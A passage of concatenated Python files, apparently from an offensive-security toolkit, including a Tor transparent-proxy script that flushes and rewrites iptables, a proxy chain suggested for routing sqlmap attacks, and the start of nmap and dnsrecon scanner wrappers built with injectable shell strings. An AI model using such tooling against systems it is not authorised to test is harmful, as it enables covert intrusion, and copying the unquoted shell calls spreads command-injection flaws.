█████▓▓▓▓▓▓▓▓█▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
█████▓▓▓▓▓▓▓██▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
█████▓▓▓▓▓████▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
████▓█▓▓▓▓██▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
████▓▓███▓▓▓▓▓▓▓██▓╬╬╬╬╬╬╬╬╬╬╬╬█▓╬▓╬╬▓██
█████▓███▓▓▓▓▓▓▓▓████▓▓╬╬╬╬╬╬╬█▓╬╬╬╬╬▓██
█████▓▓█▓███▓▓▓████╬▓█▓▓╬╬╬▓▓█▓╬╬╬╬╬╬███
██████▓██▓███████▓╬╬╬▓▓╬▓▓██▓╬╬╬╬╬╬╬▓███
███████▓██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬████
███████▓▓██▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓████
████████▓▓▓█████▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█████
█████████▓▓▓█▓▓▓▓▓███▓╬╬╬╬╬╬╬╬╬╬╬▓██████
██████████▓▓▓█▓▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬▓███████
███████████▓▓█▓▓▓▓███▓╬╬╬╬╬╬╬╬╬▓████████
██████████████▓▓▓███▓▓╬╬╬╬╬╬╬╬██████████
███████████████▓▓▓██▓▓╬╬╬╬╬╬▓███████████
""" + bcolors.ENDC)
print(bcolors.GREEN + " ~[ " + color() + "Be strong and of a good courage, fear not, nor be afraid" + bcolors.GREEN + " ]~ " + color() + "\n\n " + bcolors.YELLOW + "~[ " + color() + "Deut.31:6" + bcolors.YELLOW + " ]~" + bcolors.ENDC)
def mask():
try:
mask0 = requests.get('https://icanhazip.com/').text
except requests.exceptions.RequestException:
try:
mask1 = requests.get('https://ipinfo.io/ip').text
return mask1
except requests.exceptions.RequestException as e:
print(f'\n{e}')
sys.exit(color() + """\n Sorry, can't fetch the Details.
Either the site's down or something's up with your internet-config.
You may find solution here :)
https://github.com/Feliz-SZK/Linux-Decoded/blob/master/Fix%20temporary%20failure%20in%20name%20resolution.md""" + bcolors.ENDC)
return mask0
def frag():
fragment = subprocess.Popen("iptables -t nat -L -n", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
frag, defrag = fragment
if defrag: print(f"\n{bcolors.RED}encounterd some problems while checking the iptables-details{bcolors.ENDC}")
return frag.decode("utf-8")
def finesse(langa, resolv_switch):
if langa > 5:
sys.exit(f"\n{color(bcolors.RED)}excceeded no of retries, terminating to prevent memory corruption.{bcolors.ENDC}")
if not os.path.exists('/etc/resolv.conf'):
print(f"\n{color(bcolors.BLUE)}resolv.conf file is missing,", end=" ")
asking = str(input(f"{color(bcolors.BLUE)}you want me to manually create it for you! {bcolors.GREEN}Y/N: {bcolors.ENDC}")).lower().strip()
if asking == 'y':
try:
with open("/etc/resolv.conf", "w") as f:
f.write("nameserver 127.0.0.1")
resolv_switch += 1
print(f"{color()}Done, saved with local dns.{bcolors.ENDC}")
except Exception as e:
print(f"{color(bcolors.RED)}something's wrong, can't write the file.{bcolors.ENDC}\n{e}")
elif asking == "n":
sys.exit(f"{color(bcolors.GREEN)}Roger that, terminating....{bcolors.ENDC}")
else:
langa += 1
return finesse(langa, resolv_switch)
return resolv_switch
torrstring = ['# Generated by africana-framework. Delete at your own risk!', '', 'VirtualAddrNetworkIPv4 10.192.0.0/10', 'AutomapHostsOnResolve 1',
'TransPort 9040 IsolateClientAddr IsolateClientProtocol IsolateDestAddr IsolateDestPort', 'DNSPort 5353', 'CookieAuthentication 1']
resolvstring = '# Generated by africana-framework. Delete at your own risk!\n\nnameserver 127.0.0.1'
def resolv_config(r_switch):
if r_switch == 0:
with open('/etc/resolv.conf') as f:
lines = f.read().splitlines()
if resolvstring not in lines:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Configuring resolv.conf {bcolors.BLUE} ] {bcolors.ENDC}")
time.sleep(0.4)
os.system("cp /etc/resolv.conf /etc/resolv.conf.backup_africana")
with open('/etc/resolv.conf', 'w') as rconf:
rconf.write("%s\n" % resolvstring)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
else:
if resolvstring in list(filter(lambda rc: 'nameserver' in rc, lines))[0]:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Configuring Resolv.config {bcolors.BLUE} ] {bcolors.ENDC}")
time.sleep(0.4)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
time.sleep(0.5)
else:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Configuring resolv.conf {bcolors.BLUE} ] {bcolors.ENDC}")
os.system('cp /etc/resolv.conf /etc/resolv.conf.backup_africana')
with open('/etc/resolv.conf', 'w') as rconf:
rconf.write("%s\n" % resolvstring)
print(color(bcolors.RED) + "Done...." + bcolors.ENDC)
else:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Configuring resolv.conf {bcolors.BLUE} ] {bcolors.ENDC}")
time.sleep(0.4)
print(color() + " :) Already Configured" + bcolors.ENDC)
return 0
def configure():
if "vanish" in frag(): sys.exit(f"\n{bcolors.RED} vanish{bcolors.BLUE} is already running....{bcolors.ENDC}")
r_switch = finesse(0, 0)
if os.system("which tor > /dev/null") == 0:
if not os.path.exists('/etc/tor/torrc'):
print(
f"{color(bcolors.RED)}No torrc file is configured.....{bcolors.ENDC}{color(bcolors.GREEN)}Configuring:)")
try:
f = open('/etc/tor/torrc', 'w+')
for elements in torrstring:
f.write("%s\n" % elements)
f.close()
print(f"{color(bcolors.CYAN)}Done....{bcolors.ENDC}")
except Exception as e:
print(f"{color(bcolors.RED)}Failed to write the torrc file{bcolors.ENDC} \n {e}")
sys.exit()
else:
print(f"\n{bcolors.BLUE} [ {bcolors.YELLOW} Configuring Torrc {bcolors.BLUE} ] {bcolors.ENDC}")
time.sleep(0.4)
subprocess.Popen(["cp", "/etc/tor/torrc", "/etc/tor/torrc.bak_africana"], stdout=subprocess.PIPE).communicate()
torrc = open('/etc/tor/torrc', 'w')
for elements in torrstring:
torrc.write("%s\n" % elements)
torrc.close()
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
else:
print(f"\n{bcolors.BLUE} [ {bcolors.RED}tor isn't installed, try 'sudo apt install tor' {bcolors.BLUE} ] {bcolors.ENDC}")
sys.exit()
subprocess.Popen(['service', 'tor', 'restart'])
resolv_config(r_switch)
def terminate():
subprocess.Popen(['service', 'tor', 'stop'])
trigger = 0
if os.path.exists('/etc/resolv.conf.backup_africana'):
trigger += 1
restore = "yes | mv /etc/resolv.conf.backup_africana /etc/resolv.conf"
process = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=open(os.devnull, 'wb'), stderr=subprocess.PIPE)
print(f"\n{bcolors.BLUE} [ {bcolors.YELLOW} reverting to default resolv.conf {bcolors.BLUE} ] {bcolors.ENDC}")
out, err = process.communicate(restore.encode('utf-8'))
if err:
print('\n' + err.decode('utf8').replace("\n", '\n'))
print(bcolors.RED + r'''\n I guess you're messing around, else your system has some serious issues; deleting backups itself.''' + bcolors.ENDC)
sys.exit()
time.sleep(0.5)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
if os.path.exists('/etc/tor/torrc.bak_africana'):
trigger += 1
torrc_restore = "mv /etc/tor/torrc.bak_africana /etc/tor/torrc"
process = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=open(os.devnull, 'wb'), stderr=subprocess.PIPE)
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} dropping of torrc file {bcolors.BLUE} ]{bcolors.ENDC}")
out, err = process.communicate(torrc_restore.encode('utf-8'))
if err:
print("\n" + err.decode('utf8').replace("\n", '\n'))
print(" ")
print(bcolors.GREEN + r'''I guess you're messing around, else your system has some serious issues(deleting backups itself)''' + bcolors.ENDC)
sys.exit()
time.sleep(0.5)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
if "vanish" in frag():
trigger += 1
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Restoring Iptables rules {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
if os.path.exists("/etc/iptables_rules_vanish.bak"):
one, afric = subprocess.Popen('iptables-restore < /etc/iptables_rules_vanish.bak', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
os.remove('/etc/iptables_rules_vanish.bak')
if afric and b"Warning" not in afric:
print(f"{bcolors.RED} can't restore previous rules, seems the file's being tampered with\n{bcolors.RED} {afric.decode('utf-8').strip()}{bcolors.ENDC}")
print(f"{bcolors.GREEN}{bcolors.BOLD}Defaulting..{bcolors.ENDC}")
reset_to_default(overide_pass=True)
else:
reset_to_default(overide_pass=True, reset_as_child_func=True)
time.sleep(1)
if trigger == 0:
print(f"\n{bcolors.BLUE} [ {bcolors.YELLOW} No instances of tor has been executed {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
sys.exit()
else:
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Cleaning up complete {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.RED} 'Tor services has stoped!!!' {bcolors.BLUE} ]{bcolors.ENDC}")
def torcircuit():
if not 'vanish' in frag():
print(f"\n{bcolors.BLUE} [ {bcolors.YELLOW} You must start vanish first {bcolors.BLUE} ]{bcolors.ENDC}")
sys.exit()
else:
subprocess.Popen(['service', 'tor', 'reload'])
print(bcolors.GREEN + "\nSrambling Tor Nodes" + bcolors.ENDC)
time.sleep(0.4)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
time.sleep(0.4)
print(bcolors.GREEN + "Your new ip appears to be: " +
bcolors.ENDC + color() + bcolors.BOLD + str(mask()) + bcolors.ENDC)
def tor_stat(e_langa):
try:
resp = requests.get("https://check.torproject.org")
except Exception as e:
e_langa += 1
if e_langa > 2:
print(f"\n{bcolors.BLUE} [ {bcolors.RED} Unable to get the network-details, try Option 5. {bcolors.BLUE}]{bcolors.ENDC}")
sys.exit(1)
print(f"{color(bcolors.ENDC)}\n -[ {color(bcolors.GREEN)}having trouble fetching exit-node details, {color(bcolors.CYAN)}retrying.... {color()} {e_langa}{color(bcolors.ENDC)} ]-{bcolors.ENDC}")
time.sleep(1.2)
return tor_stat(e_langa)
status = re.search(r'<title[^>]*>([^<]+)</title>', resp.text).group(1)
mask = re.search( r'[0-9]+(?:\.[0-9]+){3}', resp.text ).group(0)
print("\n Your Ip address is: " + color() + bcolors.BOLD + mask + bcolors.ENDC)
print(f"{color()}Congratulations, you're using tor :){bcolors.ENDC}") if "Congratulations" in status.strip() else print(f"{color()}{status.strip()}{bcolors.ENDC}")
return 0
def check_default_rules(shell:bool = True):
return subprocess.Popen(r"iptables-save | grep '^\-' | wc -l", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell).communicate()
def firewall():
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Backing up Iptables.. {bcolors.BLUE} ]{bcolors.ENDC}")
firewall_green, firewall_red = check_default_rules()
if firewall_red:
print(f"{bcolors.RED}\nCan't execute {bcolors.BLUE}iptables-save{bcolors.ENDC}. see the reson below.\n{bcolors.RED}{bcolors.BOLD}{firewall_red.decode('utf-8')}{bcolors.ENDC}")
sys.exit()
if firewall_green.strip() == b'0':
print(f" {bcolors.BLUE}default rules are configured, skipping..")
else:
proc = subprocess.Popen('iptables-save > /etc/iptables_rules_vanish.bak', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
outp, error = proc.communicate()
if error and b'Warning:' not in error:
print(f"{bcolors.RED}\nCan't seem to save the iptables_bakup file in /etc.\n{error.decode('utf-8')}")
sys.exit()
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.YELLOW}location: /etc/iptables_rules_vanish.bak {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
inn_out_rules = '''
### Set variables
# The UID that Tor runs as (varies from system to system)
_tor_uid=`id -u debian-tor` #Debian/Ubuntu
# Tor's TransPort
_trans_port="9040"
# Tor's DNSPort
_dns_port="5353"
# Tor's VirtualAddrNetworkIPv4
_virt_addr="10.192.0.0/10"
# LAN destinations that shouldn't be routed through Tor
_non_tor="127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16"
# Other IANA reserved blocks (These are not processed by tor and dropped by default)
_resv_iana="0.0.0.0/8 100.64.0.0/10 169.254.0.0/16 192.0.0.0/24 192.0.2.0/24 192.88.99.0/24 198.18.0.0/15 198.51.100.0/24 203.0.113.0/24 224.0.0.0/4 240.0.0.0/4 255.255.255.255/32"
# Flushing existing Iptables Chains/Firewall rules #
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -t raw -F
iptables -t raw -X
### *nat OUTPUT (For local redirection)
# nat .onion addresses
iptables -t nat -A OUTPUT -d $_virt_addr -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports $_trans_port
# nat dns requests to Tor
iptables -t nat -A OUTPUT -d 127.0.0.1/32 -p udp -m udp --dport 53 -j REDIRECT --to-ports $_dns_port -m comment --comment "vanish_triggered"
# Don't nat the Tor process, the loopback, or the local network
iptables -t nat -A OUTPUT -m owner --uid-owner $_tor_uid -j RETURN
iptables -t nat -A OUTPUT -o lo -j RETURN
# Allow lan access for hosts in $_non_tor and $_resv_ina
# This is to make sure that this local addresses don't get dropped.
for _lan in $_non_tor; do
iptables -t nat -A OUTPUT -d $_lan -j RETURN
done
for _iana in $_resv_iana; do
iptables -t nat -A OUTPUT -d $_iana -j RETURN
done
# Redirect all other pre-routing and output to Tor's TransPort
iptables -t nat -A OUTPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports $_trans_port
### *filter INPUT
iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
# Log & Drop everything else. Uncomment to enable logging
#iptables -A INPUT -j LOG --log-prefix "Dropped INPUT packet: " --log-level 7 --log-uid
iptables -A INPUT -j DROP
### *filter FORWARD
iptables -A FORWARD -j DROP
### Fix for possible kernel packet-leak as discussed in,
### https://lists.torproject.org/pipermail/tor-talk/2014-March/032507.html
### uncomment below lines to log dropped packets
iptables -A OUTPUT -m conntrack --ctstate INVALID -j DROP
# iptables -A OUTPUT -m state --state INVALID -j LOG --log-prefix "Transproxy state leak blocked: " --log-uid
iptables -A OUTPUT -m state --state INVALID -j DROP
### *filter OUTPUT
iptables -A OUTPUT -m state --state ESTABLISHED -j ACCEPT
# Allow Tor process output
iptables -A OUTPUT -m owner --uid-owner $_tor_uid -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -m state --state NEW -j ACCEPT
# Allow loopback output
iptables -A OUTPUT -d 127.0.0.1/32 -o lo -j ACCEPT
# Tor transproxy magic
iptables -A OUTPUT -d 127.0.0.1/32 -p tcp -m tcp --dport $_trans_port --tcp-flags FIN,SYN,RST,ACK SYN -j ACCEPT
# Drop everything else.
iptables -A OUTPUT -j DROP
### Set default policies to DROP
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
'''
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Backing up Iptables.. {bcolors.BLUE} ]{bcolors.ENDC}")
process5 = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=open(os.devnull, 'wb'), stderr=subprocess.PIPE)
out5, err5 = process5.communicate(inn_out_rules.encode('utf-8'))
if err5:
print('\n' + color() + err5.decode('utf8').strip() + bcolors.ENDC)
print("""There's something strange with your system
It doesn't let me change the iptable rules""")
sys.exit()
time.sleep(1.2)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
def reset_to_default(reset_trigger: int= 0, overide_pass: bool= False, reset_as_child_func:bool = False, nuke_sanity:bool = False):
if not overide_pass:
if reset_trigger >7: sys.exit(f"{bcolors.RED}exiting to prevent memory corruption.{bcolors.ENDC}")
reset_consent = input(f"{color()}\nThis will overwrite all of your existing rules {bcolors.GREEN}Y(do it){bcolors.ENDC}/{bcolors.RED}N(exit){bcolors.ENDC}: ").lower()
if reset_consent == 'y': pass
elif reset_consent == 'n': sys.exit(f"{bcolors.RED}Copy that..\n{bcolors.ENDC}")
else:
reset_trigger += 1
return reset_to_default(reset_trigger=reset_trigger)
time.sleep(1)
print(f'{PURPLE}Backing up current rules, just in case..{bcolors.ENDC}')
default_check_green, default_check_red = check_default_rules()
if default_check_red:
print(f"{bcolors.RED}Error while checking existing rules; {orange}exiting..\n{yellow}Error message: {color()}{default_check_red.decode('utf-8')}{bcolors.ENDC}")
sys.exit()
if default_check_green.strip() != b'0':
file_name_id = time.strftime("%m_%d_%Y-%H:%M:%S", time.localtime())
proc = subprocess.Popen(f'sudo iptables-save > /tmp/iptables_{file_name_id}.rules', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
outp, error = proc.communicate()
if error and b'Warning:' not in error:
print(f"{bcolors.RED}\nCan't seem to save the iptables_bakup file in /tmp directory.\n{error.decode('utf-8')}")
sys.exit()
print(f"{bcolors.CYAN}Saved in {bcolors.BLUE}/tmp{bcolors.ENDC} as {bcolors.RED}iptables_{file_name_id}.rules{bcolors.ENDC}", end='\n\n')
else:
print(f"{bcolors.CYAN} Default rules are set, backup not required :){bcolors.ENDC}", end= "\n")
nuke_sanity = True
print(bcolors.GREEN + bcolors.BOLD + 'Reseting Iptables' + bcolors.ENDC) if not nuke_sanity else print(f"{bcolors.CYAN}{bcolors.BOLD}I'm nuking everything just for sanity{bcolors.ENDC}")
iptables_rules = '''
# Accepting all traffic first#
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
# Flushing All Iptables Chains/Firewall rules #
iptables -F
# Deleting all Iptables Chains #
iptables -X
# Flushing all counters too #
iptables -Z
# Flush and delete all nat and mangle #
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -t raw -F
iptables -t raw -X
'''
process = subprocess.Popen(
'/bin/bash', stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = process.communicate(iptables_rules.encode('utf-8'))
time.sleep(0.5)
if err:
print(color() + "Can't reset Iptables")
print(color() + '\n' + err.decode('utf8').strip() + bcolors.ENDC)
sys.exit()
if reset_as_child_func:
pass
else:
print(f"{bcolors.BLUE} Successfully reset Iptables to default :)")
return 0
def usage():
print(color() + """
__ _____ _____ _ _
__| |___ ___ _ _ ___| | | |___|_|___| |_
| | | -_|_ -| | |_ -| --| | _| |_ -| _|
|_____|___|___|___|___|_____|__|__|_| |_|___|_|
loves you.\n""" + bcolors.ENDC)
print(bcolors.ENDC + " -{ " + bcolors.GREEN + bcolors.UNDERL + "For God so loved the world, that he gave His." + bcolors.ENDC + color() + " [John 3:16] " + bcolors.ENDC + "}- " + bcolors.ENDC)
print(bcolors.BLUE + "\n -{" + bcolors.ENDC + bcolors.UNDERL + " Use Options from the table below" + bcolors.ENDC + bcolors.BLUE + " }-\n" + bcolors.ENDC)
print(bcolors.BLUE + " [ -h show this help message and exit ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -m start anonymizing ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -e get back to the surface-web ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -i check current IP address ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -s connect to a different exit-node ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -w check if using tor ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -n back up & resets Iptables to default ] " + bcolors.ENDC)
arg = sys.argv[1:]
args = {"proxy": ["-m"], "surface":["-e"], "identity":["-i"], "scramble": ["-s"], "cover": ['-w'], "revert_tables": ["-n"], "help": ["-h", "--help"]}
if len(arg) != 1:
print(bcolors.BLUE + "\n -{" + bcolors.RED + " I need an argument: eg -m or -e, use -h/--help for usage " + bcolors.ENDC + bcolors.BLUE + " }-\n" + bcolors.ENDC)
usage()
elif sys.argv[1].lower() in args['proxy']:
sudo()
logo("sleep")
configure()
firewall()
tor_stat(0)
elif sys.argv[1].lower() in args['surface']:
sudo()
logo("sleep")
terminate()
elif sys.argv[1].lower() in args['identity']:
logo()
print('\n' + bcolors.GREEN + 'your ip is: ' + bcolors.ENDC + color() + mask() + bcolors.ENDC)
elif sys.argv[1].lower() in args['scramble']:
sudo()
logo("sleep")
torcircuit()
elif sys.argv[1].lower() in args['cover']:
logo()
tor_stat(0)
elif sys.argv[1].lower() in args['revert_tables']:
sudo()
logo("sleep")
reset_to_default()
elif sys.argv[1].lower() in args['help']:
usage()
else:
print(
f"\n{color(bcolors.BLUE)} -[ {color(bcolors.GREEN)}{sys.argv[1]}!{color(bcolors.BLUE)} isn't a valid trigger. ]-{bcolors.ENDC}")
usage()
| 29,640 | Python | .py | 534 | 44.035581 | 266 | 0.556712 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,858 | secmon.py | CHEGEBB_africana-framework/modules/secmon.py | import subprocess
from src.core.bcolors import *
class pproxy_mon(object):
def __init__(self):
pass
def pproxy(self):
print(bcolors.RED + "\n Part of africana-framework" + bcolors.ENDC)
print(bcolors.RED + " Your internet proxy connections routes\n" + bcolors.ENDC)
print(bcolors.BLUE + " Copy & Paste " + bcolors.RED + "-> " + bcolors.YELLOW + "tail -f /var/log/privoxy/logfile " + bcolors.BLUE + "To see Your Logs" + bcolors.ENDC)
print(bcolors.BLUE + " Launch attack using port 8888 " + bcolors.RED + "ex. " + bcolors.GREEN + "sqlmap --proxy=http://127.0.0.1:8888" + bcolors.ENDC)
print(bcolors.BLUE + "\n -[ Your Proxy Chains ]-\n" + bcolors.ENDC)
print(bcolors.GREEN + " ( Local " + bcolors.RED + "> " + bcolors.YELLOW + "8888 " + bcolors.RED + "> " + bcolors.GREEN + "Squid " + bcolors.YELLOW + "3218 " + bcolors.RED + "> " + bcolors.GREEN + "Privoxy " + bcolors.RED + "> " + bcolors.YELLOW + "8118 " + bcolors.RED + "> " + bcolors.GREEN + "Tor " + bcolors.YELLOW + "9050 " + bcolors.RED + "> " + bcolors.GREEN + "web )\n" + bcolors.ENDC)
process = subprocess.Popen('pproxy -r http://localhost:3128 -l http://localhost:8888 -v', shell = True).wait()
sec_mon = pproxy_mon()
if ' __name__' == '__main__':
sys.exit(pproxy())
| 1,368 | Python | .py | 16 | 79.375 | 401 | 0.58963 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,859 | kenyan.py | CHEGEBB_africana-framework/modules/kenyan.py | #!/usr/bin/env python3
import os
import sys
class africana(object):
def __init__(self):
os.chdir('/usr/local/opt/africana-framework/')
os.system('python3 africana.py')
main = africana()
if ' __name__' == '__main__':
sys.exit(main())
| 265 | Python | .py | 10 | 22.3 | 54 | 0.616601 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,860 | info.py | CHEGEBB_africana-framework/guide/info.py | import sys
import time
from src.core.bcolors import *
class guide_inf(object):
def __init__(self):
pass
def guide(self):
with open('./guide/guide.txt', 'r') as guide:
for line in guide:
sys.stdout.write(bcolors.GREEN + line + bcolors.ENDC)
sys.stdout.flush()
time.sleep(0.0)
guide_info = guide_inf()
if ' __name__' == '__main__':
sys.exit(guide_info())
| 447 | Python | .py | 15 | 22.533333 | 69 | 0.560465 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,861 | africana.py | CHEGEBB_africana-framework/source/africana.py | #!/usr/bin/env python3
import os
import sys
import time
import subprocess
def check_os():
if os.name == "nt":
operating_system = "windows"
if os.name == "posix":
operating_system = "posix"
return operating_system
if check_os() == "posix":
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGreen = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
else:
class bcolors:
PURPLE = ''
CYAN = ''
DARKCYAN = ''
BLUE = ''
GREEN = ''
YELLOW = ''
RED = ''
BOLD = ''
UNDERL = ''
ENDC = ''
backBlack = ''
backRed = ''
backGreen = ''
backYellow = ''
backBlue = ''
backMagenta = ''
backCyan = ''
backWhite = ''
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
class main(object):
def __init__(self):
pass
def intro_banner(self):
print(bcolors.GREEN + bcolors.BOLD + " \nHey U! Jesus Is @ the door Knocking. Do Something. " + bcolors.ENDC)
print(bcolors.GREEN + bcolors.BOLD + """
wake up, Christian
Lord God Jesus Christ L❤️.VE'S you
follow the white Pigeon.
knock, knock, knock,
Man Of God.""" + bcolors.ENDC)
start = r'''
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_' '
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``- [By: r0jahsm0ntar1]
``-..__``--` [God is True ❤️. John 3:16]'''
for s in start:
sys.stdout.write(s)
sys.stdout.flush()
time.sleep(0.001)
def attacker_banner(self):
print(bcolors.GREEN + bcolors.BOLD + """
.,'
.''.'
.' .'
_.ood0Pp._ ,' `.~ .q?00doo._
.od00Pd0000Pdb._. . _:db?000b?000bo.
.?000Pd0000Pd0000PdbMb?0000b?000b?0000b.
.d0000Pd0000Pd0000Pd0000b?0000b?000b?0000b.
d0000Pd0000Pd00000Pd0000b?00000b?0000b?000b.
00000Pd0000Pd0000Pd00000b?00000b?0000b?0000b
?0000b?0000b?0000b?00Pd0[Praise be to Jesus]
?0000b?0000b?0000b?00000Pd00000Pd0000Pd000P
`?0000b?0000b?0000b?0000Pd0000Pd0000Pd000P'
`?000b?0000b?000b?0000Pd000Pd0000Pd000P
`~?00b?000b?000b?000Pd00Pd000Pd00P'
`~?0b?0b?000b?0Pd0Pd000PdP~' [Christian]""" + bcolors.ENDC)
def closser_banner(self):
close = r'''
____ _
/ __ \___ __________(_)___ _____
/ /_/ / _ \/ ___/ ___/ / __ ` / __ \
/ ____/ __/ / (__ ) / /_/ // / / /
/_/ \___/_/In Serving Jesus.Defeat the Devil By: Fasting & Praying.'''
for c in close:
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(0.01)
class scanners(main):
def __init__(self, host):
self.host = host
main.attacker_banner(self)
def nmap(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] Nmap Scanner Has Began to find Open Ports .." + bcolors.ENDC)
process = subprocess.Popen("nmap -p- {0}".format(host), shell = True).wait()
return process
def dnsrec(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] Dnsrecon has started Scanning for subdomains .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("dnsrecon -a -d {0}".format(host), shell = True).wait()
return process
def whatweb(self, host):
